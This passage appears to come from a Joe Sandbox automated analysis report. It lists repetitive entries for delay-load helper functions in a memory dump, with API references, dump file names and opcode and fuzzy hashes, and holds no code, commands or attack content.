                                                                                                                                                                                                    • Opcode ID: f044820820c4e45491b36465e40f2bb58fc51f1bc8cca855f1204c37000e72eb
                                                                                                                                                                                                    • Instruction ID: 4015d0a0ddc947f9f40f871b36c10014981d96ea2961f85b6976bd92ff89ea5e
                                                                                                                                                                                                    • Opcode Fuzzy Hash: f044820820c4e45491b36465e40f2bb58fc51f1bc8cca855f1204c37000e72eb
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 98B012E125A020BD3148D1053D02C3702ACD1C1B21332C02EF898D11C0EB404C141473
                                                                                                                                                                                                    Function 0012E50D Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 0012E51F
                                                                                                                                                                                                      • Part of subcall function 0012E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0012E8D0
                                                                                                                                                                                                      • Part of subcall function 0012E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0012E8E1
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000001A.00000002.1867737796.0000000000111000.00000020.00000001.01000000.00000009.sdmp, Offset: 00110000, based on PE: true
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867722166.0000000000110000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867763975.0000000000143000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867782801.000000000014E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867782801.0000000000155000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867782801.0000000000172000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867848683.0000000000173000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_26_2_110000_migrate.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 1269201914-0
                                                                                                                                                                                                    • Opcode ID: dd111dfb49b6fec19cd5d6ecd369249df32dcfb9c4ac4a068598dc0cd4f1ba79
                                                                                                                                                                                                    • Instruction ID: b42ecc44da70e7cd2b39e689deaf8f3bb83da24a2ffca93dc53fc8653fcd08c5
                                                                                                                                                                                                    • Opcode Fuzzy Hash: dd111dfb49b6fec19cd5d6ecd369249df32dcfb9c4ac4a068598dc0cd4f1ba79
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 36B012C53690107C310811243D06C3B015CD1C2F10332C03EF468D4481BB404D141472
                                                                                                                                                                                                    Function 0012E532 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 0012E51F
                                                                                                                                                                                                      • Part of subcall function 0012E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0012E8D0
                                                                                                                                                                                                      • Part of subcall function 0012E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0012E8E1
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000001A.00000002.1867737796.0000000000111000.00000020.00000001.01000000.00000009.sdmp, Offset: 00110000, based on PE: true
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867722166.0000000000110000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867763975.0000000000143000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867782801.000000000014E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867782801.0000000000155000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867782801.0000000000172000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867848683.0000000000173000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_26_2_110000_migrate.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 1269201914-0
                                                                                                                                                                                                    • Opcode ID: bd93f74c282a3f8a8d8d47c599e22c2537d7d16b46fd22cdda5793839216d7b7
                                                                                                                                                                                                    • Instruction ID: 210925e468e6464355781d0609a1283f04c69cb27eb749448cae7e346f5a31f7
                                                                                                                                                                                                    • Opcode Fuzzy Hash: bd93f74c282a3f8a8d8d47c599e22c2537d7d16b46fd22cdda5793839216d7b7
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 75B012C53A90107D314851083D02D3B01DCD1C2F10332C02EF41CC4180FB404C101472
                                                                                                                                                                                                    Function 0012E528 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 0012E51F
                                                                                                                                                                                                      • Part of subcall function 0012E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0012E8D0
                                                                                                                                                                                                      • Part of subcall function 0012E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0012E8E1
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000001A.00000002.1867737796.0000000000111000.00000020.00000001.01000000.00000009.sdmp, Offset: 00110000, based on PE: true
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867722166.0000000000110000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867763975.0000000000143000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867782801.000000000014E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867782801.0000000000155000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867782801.0000000000172000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867848683.0000000000173000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_26_2_110000_migrate.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 1269201914-0
                                                                                                                                                                                                    • Opcode ID: 390a76d9aaac3199df60c86e231cead87dda2cfcc2fcdd04339e221ddd6adfa1
                                                                                                                                                                                                    • Instruction ID: 69a22c5a63e23e6c190ec60e21714ebb750fc29143add1e9cffb917ca522d9b0
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 390a76d9aaac3199df60c86e231cead87dda2cfcc2fcdd04339e221ddd6adfa1
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 31B012C53A90607C314851083E02C3B059CC1C2F10332C02EF41CC4180FB404C111471
                                                                                                                                                                                                    Function 0012E546 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 0012E51F
                                                                                                                                                                                                      • Part of subcall function 0012E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0012E8D0
                                                                                                                                                                                                      • Part of subcall function 0012E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0012E8E1
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000001A.00000002.1867737796.0000000000111000.00000020.00000001.01000000.00000009.sdmp, Offset: 00110000, based on PE: true
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867722166.0000000000110000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867763975.0000000000143000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867782801.000000000014E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867782801.0000000000155000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867782801.0000000000172000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867848683.0000000000173000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_26_2_110000_migrate.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 1269201914-0
                                                                                                                                                                                                    • Opcode ID: 8526839453bc8833cc8e4f1f57f15f12b77e51687f515b1e232789c032b14644
                                                                                                                                                                                                    • Instruction ID: ddda3611f5271f43627993ac13c26be954482bf72d1fe8b3fac66762776cebdc
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 8526839453bc8833cc8e4f1f57f15f12b77e51687f515b1e232789c032b14644
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 12B012C53691107C324851087D03C3B019CC1C2F10332C22EF41CC4180FB404C541471
                                                                                                                                                                                                    Function 0012E593 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 0012E580
                                                                                                                                                                                                      • Part of subcall function 0012E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0012E8D0
                                                                                                                                                                                                      • Part of subcall function 0012E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0012E8E1
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000001A.00000002.1867737796.0000000000111000.00000020.00000001.01000000.00000009.sdmp, Offset: 00110000, based on PE: true
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867722166.0000000000110000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867763975.0000000000143000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867782801.000000000014E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867782801.0000000000155000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867782801.0000000000172000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867848683.0000000000173000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_26_2_110000_migrate.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 1269201914-0
                                                                                                                                                                                                    • Opcode ID: 47b4910a8fe234c8683fe4cffdefc65830248a53d38c0c3b25aa01e1dd4ba0b2
                                                                                                                                                                                                    • Instruction ID: c9084b7665e928d54f83bdf08405ee31b159c977bae02da503a01a1ad778ec78
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 47b4910a8fe234c8683fe4cffdefc65830248a53d38c0c3b25aa01e1dd4ba0b2
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 00B012C52EA0207D314C51543D02C3703DCC1C1B20333C02EF418C1180FB400C241472
                                                                                                                                                                                                    Function 0012E5B1 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 0012E580
                                                                                                                                                                                                      • Part of subcall function 0012E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0012E8D0
                                                                                                                                                                                                      • Part of subcall function 0012E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0012E8E1
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000001A.00000002.1867737796.0000000000111000.00000020.00000001.01000000.00000009.sdmp, Offset: 00110000, based on PE: true
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867722166.0000000000110000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867763975.0000000000143000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867782801.000000000014E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867782801.0000000000155000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867782801.0000000000172000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867848683.0000000000173000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_26_2_110000_migrate.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 1269201914-0
                                                                                                                                                                                                    • Opcode ID: 840e2b56c94d381a8a2ee417a4a8d4645bda5291e6b7ad6879f6b8d646d588e8
                                                                                                                                                                                                    • Instruction ID: 1115993439a7d6c4172b3295b06a556fe7f299a04d136bd3674beae22fcec224
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 840e2b56c94d381a8a2ee417a4a8d4645bda5291e6b7ad6879f6b8d646d588e8
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 5DB012C52AA1207C318C51547D03C3702ACC1C1B10333C22EF418C1580FB400C641471
                                                                                                                                                                                                    Function 0012E5A7 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 0012E580
                                                                                                                                                                                                      • Part of subcall function 0012E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0012E8D0
                                                                                                                                                                                                      • Part of subcall function 0012E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0012E8E1
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000001A.00000002.1867737796.0000000000111000.00000020.00000001.01000000.00000009.sdmp, Offset: 00110000, based on PE: true
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867722166.0000000000110000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867763975.0000000000143000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867782801.000000000014E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867782801.0000000000155000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867782801.0000000000172000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867848683.0000000000173000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_26_2_110000_migrate.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 1269201914-0
                                                                                                                                                                                                    • Opcode ID: 5666ecf663d36b0be56ba47f63112fd4d5eae778328c1a677d2c578a228be6c1
                                                                                                                                                                                                    • Instruction ID: 3dc02fd309a2beeeaae53c87669374641e5488a0d5db005ea243d00975992a99
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 5666ecf663d36b0be56ba47f63112fd4d5eae778328c1a677d2c578a228be6c1
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 22B012C52AA0307C314C51547E02C3702ACC1C1B10373C23EF418C1180FF400D251471
                                                                                                                                                                                                    Function 0012E219 Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 0012E1E3
                                                                                                                                                                                                      • Part of subcall function 0012E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0012E8D0
                                                                                                                                                                                                      • Part of subcall function 0012E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0012E8E1
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000001A.00000002.1867737796.0000000000111000.00000020.00000001.01000000.00000009.sdmp, Offset: 00110000, based on PE: true
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867722166.0000000000110000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867763975.0000000000143000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867782801.000000000014E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867782801.0000000000155000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867782801.0000000000172000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867848683.0000000000173000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_26_2_110000_migrate.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 1269201914-0
                                                                                                                                                                                                    • Opcode ID: 45775d5235f45f69f9afa8cf1e66e200960c576e570805f316e01269136afed0
                                                                                                                                                                                                    • Instruction ID: 83c8098eb968faa9df2fa98a309cc9d12c2827cd5d03706bc8c5a37cf4f6dc62
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 45775d5235f45f69f9afa8cf1e66e200960c576e570805f316e01269136afed0
                                                                                                                                                                                                    • Instruction Fuzzy Hash: ACA011E22AA022BC300822023C02C3B02ACC0C2B22332883EF802C8080AA80282008B0
                                                                                                                                                                                                    Function 0012E25F Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 0012E1E3
                                                                                                                                                                                                      • Part of subcall function 0012E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0012E8D0
                                                                                                                                                                                                      • Part of subcall function 0012E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0012E8E1
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000001A.00000002.1867737796.0000000000111000.00000020.00000001.01000000.00000009.sdmp, Offset: 00110000, based on PE: true
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867722166.0000000000110000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867763975.0000000000143000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867782801.000000000014E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867782801.0000000000155000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867782801.0000000000172000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867848683.0000000000173000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_26_2_110000_migrate.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 1269201914-0
                                                                                                                                                                                                    • Opcode ID: 41d3b771211b724eb97fac81ee47f3de830256432bb27cb7e0ea35ecc213bb5e
                                                                                                                                                                                                    • Instruction ID: 83c8098eb968faa9df2fa98a309cc9d12c2827cd5d03706bc8c5a37cf4f6dc62
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 41d3b771211b724eb97fac81ee47f3de830256432bb27cb7e0ea35ecc213bb5e
                                                                                                                                                                                                    • Instruction Fuzzy Hash: ACA011E22AA022BC300822023C02C3B02ACC0C2B22332883EF802C8080AA80282008B0
                                                                                                                                                                                                    Function 0012E27D Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 0012E1E3
                                                                                                                                                                                                      • Part of subcall function 0012E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0012E8D0
                                                                                                                                                                                                      • Part of subcall function 0012E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0012E8E1
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000001A.00000002.1867737796.0000000000111000.00000020.00000001.01000000.00000009.sdmp, Offset: 00110000, based on PE: true
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867722166.0000000000110000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867763975.0000000000143000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867782801.000000000014E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867782801.0000000000155000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867782801.0000000000172000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867848683.0000000000173000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_26_2_110000_migrate.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 1269201914-0
                                                                                                                                                                                                    • Opcode ID: e2d5085d36edf52d93d2df652ea698cedd8221edc31e51576c57f61eadb22d4e
                                                                                                                                                                                                    • Instruction ID: 83c8098eb968faa9df2fa98a309cc9d12c2827cd5d03706bc8c5a37cf4f6dc62
                                                                                                                                                                                                    • Opcode Fuzzy Hash: e2d5085d36edf52d93d2df652ea698cedd8221edc31e51576c57f61eadb22d4e
                                                                                                                                                                                                    • Instruction Fuzzy Hash: ACA011E22AA022BC300822023C02C3B02ACC0C2B22332883EF802C8080AA80282008B0
                                                                                                                                                                                                    Function 0012E291 Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 0012E1E3
                                                                                                                                                                                                      • Part of subcall function 0012E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0012E8D0
                                                                                                                                                                                                      • Part of subcall function 0012E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0012E8E1
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000001A.00000002.1867737796.0000000000111000.00000020.00000001.01000000.00000009.sdmp, Offset: 00110000, based on PE: true
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867722166.0000000000110000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867763975.0000000000143000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867782801.000000000014E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867782801.0000000000155000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867782801.0000000000172000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867848683.0000000000173000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_26_2_110000_migrate.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 1269201914-0
                                                                                                                                                                                                    • Opcode ID: 31214f5f8380579117f10ea175fa2e1f149cd0bf90ca45b7fb421aee369d5855
                                                                                                                                                                                                    • Instruction ID: 83c8098eb968faa9df2fa98a309cc9d12c2827cd5d03706bc8c5a37cf4f6dc62
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 31214f5f8380579117f10ea175fa2e1f149cd0bf90ca45b7fb421aee369d5855
                                                                                                                                                                                                    • Instruction Fuzzy Hash: ACA011E22AA022BC300822023C02C3B02ACC0C2B22332883EF802C8080AA80282008B0
                                                                                                                                                                                                    Function 0012E29B Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 0012E1E3
                                                                                                                                                                                                      • Part of subcall function 0012E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0012E8D0
                                                                                                                                                                                                      • Part of subcall function 0012E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0012E8E1
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000001A.00000002.1867737796.0000000000111000.00000020.00000001.01000000.00000009.sdmp, Offset: 00110000, based on PE: true
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867722166.0000000000110000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867763975.0000000000143000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867782801.000000000014E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867782801.0000000000155000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867782801.0000000000172000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867848683.0000000000173000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_26_2_110000_migrate.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 1269201914-0
                                                                                                                                                                                                    • Opcode ID: a15136a80a02d921a0b8a9fcbb9962b6dae8391d9837a9f7d4b8bd26e5d1cffe
                                                                                                                                                                                                    • Instruction ID: 83c8098eb968faa9df2fa98a309cc9d12c2827cd5d03706bc8c5a37cf4f6dc62
                                                                                                                                                                                                    • Opcode Fuzzy Hash: a15136a80a02d921a0b8a9fcbb9962b6dae8391d9837a9f7d4b8bd26e5d1cffe
                                                                                                                                                                                                    • Instruction Fuzzy Hash: ACA011E22AA022BC300822023C02C3B02ACC0C2B22332883EF802C8080AA80282008B0
                                                                                                                                                                                                    Function 0012E2A5 Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                                                                                                                                                                    Download Yara Rule
